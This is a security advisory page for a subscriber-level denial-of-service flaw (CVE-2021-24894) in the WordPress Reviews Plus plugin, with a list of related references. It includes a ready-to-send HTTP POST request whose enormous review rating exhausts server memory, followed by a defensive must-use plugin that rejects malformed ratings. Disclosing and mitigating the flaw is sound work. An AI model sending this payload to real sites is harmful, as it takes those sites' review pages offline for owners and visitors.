Reviews Plus < 1.2.14 - Subscriber+ Reviews DoS

25 Oct 2021 00:00:00 | Reported by Drew Jones | Type: wpexploit

Reviews Plus < 1.2.14 Subscriber+ DoS exploit

Related

| Reporter | Title | Published |
| --- | --- | --- |
| Cvelist | CVE-2021-24894 Reviews Plus < 1.2.14 - Subscriber+ Reviews DoS | 23 Nov 2021 19:16 |
| Patchstack | WordPress Reviews Plus plugin <= 1.2.13 - Reviews Denial of Service (DoS) vulnerability | 25 Oct 2021 00:00 |
| WPVulnDB | Reviews Plus < 1.2.14 - Subscriber+ Reviews DoS | 25 Oct 2021 00:00 |
| NVD | CVE-2021-24894 | 23 Nov 2021 20:15 |
| Prion | Design/Logic Flaw | 23 Nov 2021 20:15 |
| CVE | CVE-2021-24894 | 23 Nov 2021 20:15 |

Enable reviews for posts/pages, and also enable the "Show Reviews on" setting for All posts or pages.

Then log in as a user such as a subscriber and submit a review with a long rating, e.g.:

POST /wp-comments-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Connection: close
Cookie: [subscriber+]
Upgrade-Insecure-Requests: 1

comment_type=ic_rev_post&review_type=ic_rev_post&ic_review_rating=100000000000000000000000&ic_review_title=aa&comment=cerh&submit=Submit+Review&comment_post_ID=2123&comment_parent=0

When viewed, the review section of the post/page will crash with an error like "Allowed memory size of 268435456 bytes exhausted (tried to allocate 249561152 bytes) in /var/www/wp-content/plugins/reviews-plus/functions/functions.php on line 76".
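
A stopgap for sites that cannot update right away, as an added example that is not code from Reviews Plus or from this advisory: a must-use plugin that rejects a review whose rating is not a small whole number before WordPress stores the comment. It assumes valid ratings are 1 to 5 and that the plugin reads the rating from the ic_review_rating field shown in the request above; the function and constant names are hypothetical.

```php
<?php
/*
 * Plugin Name: Review rating guard (added example, not Reviews Plus code)
 * Place in wp-content/mu-plugins/ so it loads on every request.
 */

// Assumption: legitimate ratings are whole numbers from 1 to 5.
const RATING_GUARD_MIN = 1;
const RATING_GUARD_MAX = 5;

/** True only for a plain decimal string inside the assumed range. */
function rating_guard_is_valid( $raw ) {
    // ic_review_rating[]=... arrives as an array; never treat it as a number.
    if ( ! is_string( $raw ) ) {
        return false;
    }
    // One or two digits only: rejects signs, exponents, floats and very long
    // values before any integer conversion happens.
    if ( 1 !== preg_match( '/\A[0-9]{1,2}\z/', $raw ) ) {
        return false;
    }
    $n = (int) $raw;
    return $n >= RATING_GUARD_MIN && $n <= RATING_GUARD_MAX;
}

/** Runs on preprocess_comment, before WordPress stores the comment. */
function rating_guard_check( $commentdata ) {
    // Field name taken from the request shown on this page.
    if ( isset( $_POST['ic_review_rating'] )
        && ! rating_guard_is_valid( wp_unslash( $_POST['ic_review_rating'] ) ) ) {
        wp_die( 'Invalid review rating.', 'Bad Request', array( 'response' => 400 ) );
    }
    return $commentdata;
}
add_filter( 'preprocess_comment', 'rating_guard_check', 1 );
```

This only blocks new submissions: a review already stored with an oversized rating will still exhaust memory when its page is viewed, so it has to be removed as well.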
